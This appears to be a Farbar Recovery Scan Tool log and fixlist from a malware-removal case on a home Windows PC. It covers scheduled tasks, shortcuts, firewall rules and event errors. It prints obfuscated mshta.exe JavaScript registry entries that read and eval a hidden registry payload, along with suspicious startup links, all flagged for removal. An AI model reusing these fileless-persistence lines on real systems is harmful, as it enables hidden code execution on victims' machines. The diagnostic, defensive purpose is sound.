Task: {8EF7886D-4812-492B-BADC-02DBDCEB3F5A} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {9FFE5BAE-9E2D-4624-AA2B-DE15303E7A79} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A1D5324F-47C6-4530-8824-C6B4E5EC401F} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A6614028-9517-4EEE-BACC-B097F2B1A56F} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {AD28BEBC-2AED-40E8-B7C6-06EBFF9F32B1} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {B2AE284D-9DD9-442A-A349-D5F4A4AD0844} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B4D9E1EA-D74E-4E70-BE88-E87448FEB212} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {B6845A6F-8D15-4217-AEC1-11704CC32EE1} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {B83E3A53-FCDF-4B31-98AC-DB794D28C910} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {C9ED5E49-9E11-4673-82F4-8D342CE058E1} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {D7D53338-C725-4562-B365-F5547223869C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-12-13] (Adobe Systems Incorporated)
Task: {E1A55A6B-AF6A-4FBD-BA0E-F32178F5A63C} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E81B0FC1-BB37-4629-964D-9979EA8D3555} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F20BC99F-B740-4C9E-8EB7-371A89231811} - System32\Tasks\Microsoft\Windows\Setup\UpgradeTriggers\UpgradeNowTask => C:\WINDOWS\System32\GWX\GWXUXWorker.exe
Task: {F2575FD3-6D7D-4BC1-9BFF-3DA6F2E10777} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {F8C0FB64-4C7D-4CFB-8D81-D74199DDACA8} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {FDC49832-2BBA-446B-B0E9-488A6F92E85F} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk -> C:\Users\Dorraine\AppData\Local\7df78865\b9023127.bat ()
Shortcut: C:\Users\Dorraine\AppData\Local\360fd\41727.lnk -> C:\Users\Dorraine\AppData\Local\360fd\cf9bd.bat ()
==================== Loaded Modules (Whitelisted) ==============
2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-26 20:16 - 2016-09-26 20:16 - 01864384 _____ () C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-09-26 23:41 - 2016-09-26 23:41 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-12-13 22:59 - 2016-12-09 04:41 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-12-13 22:59 - 2016-12-09 04:40 - 00693248 _____ () C:\Windows\ShellExperiences\MtcUvc.dll
2016-11-08 20:51 - 2016-11-02 05:21 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-11-08 20:51 - 2016-11-02 05:15 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-08 20:51 - 2016-11-02 05:14 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-11-08 20:51 - 2016-11-02 05:15 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-11-08 20:51 - 2016-11-02 05:16 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-11-08 20:51 - 2016-11-02 05:17 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-11-08 20:51 - 2016-11-02 05:13 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-16 15:55 - 2016-12-16 15:55 - 63810560 _____ () C:\Users\Dorraine\AppData\Local\0bdc3b3d63\libcef.dll
2016-12-19 10:02 - 2016-12-19 10:02 - 17833560 _____ () C:\Users\Dorraine\AppData\Local\0bdc3b3d63\plugins\pepflashplayer32_24_0_0_186.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\localhost -> localhost
There are 6091 more sites.
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: WsAppService => 2
HKLM\...\StartupApproved\Run32: => "Aimersoft Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\StartupApproved\Run: => "Spotify Web Helper"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [{B163DA3D-355A-40AD-BEE9-9FB9E2C152FF}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D0CE8B62-B6BC-4673-A410-6A2F045F14CD}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D1F7E853-6C1A-4009-91E8-74231D828776}] => C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{7FC2EB58-0005-4FBA-8C88-D848CEF76D2F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{66E30416-1ECD-4FC1-B535-9FC79A3BFB79}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{D5DB3676-ADA6-444D-BF97-303E16719040}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{150A971D-796E-460A-9946-4D0DB57590F0}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{8F5D07E7-6D45-4C5C-9037-05DAD0A27745}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{FB15462A-A1F4-4E72-B28A-62B359F2D74F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{56076514-A7BE-4A47-B536-6C1658DBA05D}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{4F454C47-904F-4370-B007-FA372696CB67}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{1F425925-0F49-4E3A-9EFB-4164F18CAF22}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{6796C32A-D4FC-4F07-A7CA-74B6A1718A64}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{59AD021A-028E-4125-B679-AA29F604379C}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [TCP Query User{3312017F-DCA5-45EB-A03A-8F7CF93AA496}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{40346371-22B6-4E45-B2EA-4CFFF0CA8709}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{1273B45E-EB79-4706-A0EA-96B31F17F496}C:\users\dorraine\appdata\roaming\spotify\spotify.exe] => C:\users\dorraine\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D21F287F-8980-4A80-BD50-55EA7519F7F5}C:\users\dorraine\appdata\roaming\spotify\spotify.exe] => C:\users\dorraine\appdata\roaming\spotify\spotify.exe
FirewallRules: [{73E3D461-EE06-40E4-ACB7-63AA2FA38FFC}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{F2AC9C5B-DB98-4E25-9F59-780FE583C00C}] => C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{D845F3E0-1651-4A9E-983B-DBFFE9E31753}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{709A9412-72DC-483D-82D9-E2DC27C0D0D1}] => C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{B9F440A3-7187-4E55-85CB-EB2031F83E61}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{3A4F7DDD-6F1B-4DF7-B0BC-CFB9F537A410}C:\program files (x86)\mirc\mirc.exe] => C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{746098AE-C767-4ED8-BFE9-2276C9566D7A}C:\program files (x86)\teamviewer\teamviewer.exe] => C:\program files (x86)\teamviewer\teamviewer.exe
FirewallRules: [UDP Query User{887C56BC-951B-4C94-A7B5-8281095FE2E1}C:\program files (x86)\teamviewer\teamviewer.exe] => C:\program files (x86)\teamviewer\teamviewer.exe
FirewallRules: [{47796F37-BB7F-4635-9494-D22ACEA954A3}] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
==================== Restore Points =========================
10-12-2016 03:50:58 Scheduled Checkpoint
14-12-2016 05:53:45 Windows Update
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (01/10/2017 10:23:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 10:18:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:58:16 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:46 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:46 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:38 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:02 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (01/10/2017 06:52:02 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Dorraine-PC)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
System errors:
=============
Error: (01/11/2017 12:13:45 AM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/11/2017 12:13:45 AM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/10/2017 11:38:02 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/10/2017 03:52:38 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/10/2017 03:52:32 PM) (Source: DCOM) (EventID: 10016) (User: Dorraine-PC)
Description: The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
and APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
to the user Dorraine-PC\Dorraine SID (S-1-5-21-2694957348-435827945-4273115747-1000) from address LocalHost (Using LRPC) running in the application container Microsoft.MicrosoftSolitaireCollection_3.12.12120.0_x64__8wekyb3d8bbwe SID (S-1-15-2-1985198343-3186790915-4047221937-1969271670-3792558349-1325541827-400269725). This security permission can be modified using the Component Services administrative tool.
Error: (01/10/2017 07:01:35 AM) (Source: DCOM) (EventID: 10001) (User: Dorraine-PC)
Description: Unable to start a DCOM Server: App.AppX9s1cz53zc86xn39kwrb02jyft9ecn62r.mca as Unavailable/Unavailable. The error:
"31"
Happened while starting this command:
"C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Error: (01/10/2017 07:00:51 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.
Error: (01/10/2017 06:58:51 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {B91D5831-B1BD-4608-8198-D72E155020F7} did not register with DCOM within the required timeout.
Error: (01/10/2017 06:54:58 AM) (Source: DCOM) (EventID: 10010) (User: Dorraine-PC)
Description: The server App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca did not register with DCOM within the required timeout.
Error: (01/10/2017 06:52:58 AM) (Source: DCOM) (EventID: 10001) (User: Dorraine-PC)
Description: Unable to start a DCOM Server: App.AppXdca9rykvbm0qn1fw9m2dbx828p2w3h8p.mca as Unavailable/Unavailable. The error:
"31"
Happened while starting this command:
"C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
==================== Memory info ===========================
Processor: AMD Athlon II X2 240 Processor
Percentage of memory in use: 72%
Total physical RAM: 3838.97 MB
Available physical RAM: 1037.39 MB
Total Virtual: 7678.97 MB
Available Virtual: 3211.21 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:465.22 GB) (Free:422.69 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BF18BF18)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
==================== End of Addition.txt ====================
Fixlist.txt:
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-10]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-11]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B4A2EC81-1C16-4D3E-9275-A302BE1F49C8} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C7F3E5CE-282C-4D59-97CE-2CC1A0287DE7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
